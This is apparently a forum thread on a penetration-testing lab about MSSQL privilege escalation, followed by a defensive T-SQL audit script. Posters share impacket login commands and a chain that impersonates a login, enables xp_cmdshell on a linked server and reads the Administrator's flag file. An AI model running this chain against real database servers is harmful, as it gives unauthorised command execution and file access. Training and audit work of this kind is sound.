Attacking Common Services - Hard

i am getting this error
dsp_desc_bind: Memory allocation failure for column #1

well stuck at last point… trying to execute the read statement on local link server and getting this error

dsp_desc_bind: Memory allocation failure for column #1
Any idea… I think it's a bug…

This lab isn’t hard, it’s literally impossible given the module teachings.
I know they are trying so hard to make a reputable certification, but this is reaching stupidity levels. I am here to learn, and to learn in an easy way. I am not here to digest overcomplicated concepts.

I am a little stuck here. I have been able to RDP to the server but I am having problems connecting to the SQL server.

PS C:\Users\f*****> sqlcmd -S SQLEXPRESS -U f***** -P '********' -y 30 -Y 30
Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [53]. .
Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.
Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online..
PS C:\Users\f*****>

Am I going down the wrong path here?

Any hints would be greatly appreciated.

I figured out that

  1. Need to use computer name
  2. Do not need to specify the user creds in this case.

In my opinion, this hard lab was easier than the medium lab. I struggled on the medium lab trying to scan all ports with nmap

John is testadmin on the linked server. You are enabling xp_cmdshell on the linked server, which in turn allows you to run commands through the linked server…something like that :wink:

Although it is not obvious, one of the accounts has admin privs but not in the local instance. When you get the flag try dealing with quotes. There's an example of it in the module course.

shoutout to ChatGPT for solving this for me. just ask it how to enable xp_cmdshell

If anyone has a problem getting the flag with sqsh, try mssqlclient, it should work fine.
And if you have a problem with the encryption with mssqlclient, use this one:
python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py -p 1433 USER@IP -windows-auth
Everything will work alright I guess now.

thx bro for saving my time, :hugs:
I did it with
#impacket-mssqlclient -p 1433 fiona@10.129.0.0 -windows-auth

Definitely agree with you !

Attacking Common Services - Hard
Submit the contents of the flag.txt file on the Administrator Desktop.

I'm stuck here. I first managed to sqlcmd and impersonated the j user, for whom I found a linked database, and here I stopped.
What I have tried so far

  1. to impersonate again as the new user from the "identified linked servers" to enable xp_cmdshell
  2. read the bulk file from the administrator folder

both giving me 'you don't have permission'

Edit: I have found it, I ran the reading local file command within exec() at the linked database. Very impressive I learnt new stuff doing this. thanks @Baudejas


Hi, could you explain why it’s LOCAL.TEST.LINKED.SRV and not the other? When I performed select srvname, isremote from sysservers, it was actually WINSRV02\SQLEXPRESS that returned 1

nope,

Don't make this one too complicated. There are multiple ways.

Just use cmdshell and from there you can do anything with system rights, e.g. read the file, or give admin permissions to a user and go from there :slight_smile:


This particular comment helped me tremendously.
This MSSQL stuff is super difficult, but I have a feeling the cert is going to require a fair bit of traversal here. Thank you!

Hi, I get the same error about mapping. Could you tell me what's wrong and how to solve it? Many thanks

Nevermind, solved it. It was a tough one I must admit but very satisfying in the end.

Hello, I am stuck and really need help. To my knowledge, what I am trying should work. Can somebody tell me what I am doing wrong?

Error:
[-] ERROR(WIN-HARD\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

Commands I use (quotes are plain single quotes; the forum renders them as curly quotes, which T-SQL does not accept)

EXECUTE AS LOGIN = 'john'

EXEC [LOCAL.TEST.LINKED.SRV].master.dbo.sp_configure 'show advanced options', 1

EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]

EXEC [LOCAL.TEST.LINKED.SRV].master.dbo.sp_configure 'xp_cmdshell', 1

EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]

-- inside the EXEC string every single quote is doubled; the string ends with three quotes: two closing the inner ''...'' and one closing the outer '...'
EXEC('EXECUTE AS LOGIN = ''john''; EXEC xp_cmdshell ''type C:\users\administrator\desktop\flag.txt''') AT [LOCAL.TEST.LINKED.SRV]
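The thread keeps circling three facts about the instance: which servers are linked (the sysservers question above), whether RPC Out is enabled on the link so that EXEC ... AT works, and whether xp_cmdshell is on and who may impersonate whom. The T-SQL below is an added audit script, not posted by anyone in this thread, that a DBA or defender can run as a sysadmin to read those facts off the catalog views rather than discovering them by trial and error. It uses only the documented views sys.servers, sys.configurations, sys.server_permissions and sys.server_principals; the linked server name [LOCAL.TEST.LINKED.SRV] is taken from the thread and is assumed to exist.

```sql
-- Added audit script (not from the thread). Run on the local instance as sysadmin.

-- 1. Linked servers and whether remote procedure calls are allowed over them.
--    EXEC ('...') AT [server] only works when is_rpc_out_enabled = 1.
SELECT name,
       is_linked,
       is_rpc_out_enabled,
       is_data_access_enabled,
       is_remote_login_enabled
FROM sys.servers
ORDER BY server_id;

-- 2. xp_cmdshell and 'show advanced options' state on the local instance.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 3. Same check on the linked server, read-only, through the link the thread uses.
--    Assumes [LOCAL.TEST.LINKED.SRV] exists and RPC Out is enabled on it.
EXEC ('SELECT name, value_in_use FROM sys.configurations WHERE name = ''xp_cmdshell''')
    AT [LOCAL.TEST.LINKED.SRV];

-- 4. Which logins are allowed to impersonate which other logins.
--    class = 101 is SERVER_PRINCIPAL, so major_id is the impersonated login.
SELECT grantee.name      AS grantee_login,
       target.name       AS impersonated_login,
       pe.state_desc,
       pe.permission_name
FROM sys.server_permissions AS pe
JOIN sys.server_principals AS grantee ON grantee.principal_id = pe.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = pe.major_id
WHERE pe.class = 101
  AND pe.permission_name = 'IMPERSONATE';

-- 5. Members of the sysadmin role on the local instance, to compare with step 4.
SELECT m.name AS member_login
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';
```

If step 4 shows a low-privileged login with IMPERSONATE on a login that step 5 lists under sysadmin, or that is sysadmin on the linked server, that chain is exactly the privilege path this lab exercises; the hardening is to revoke the IMPERSONATE grant, disable RPC Out on links that do not need it, and keep xp_cmdshell at value_in_use = 0.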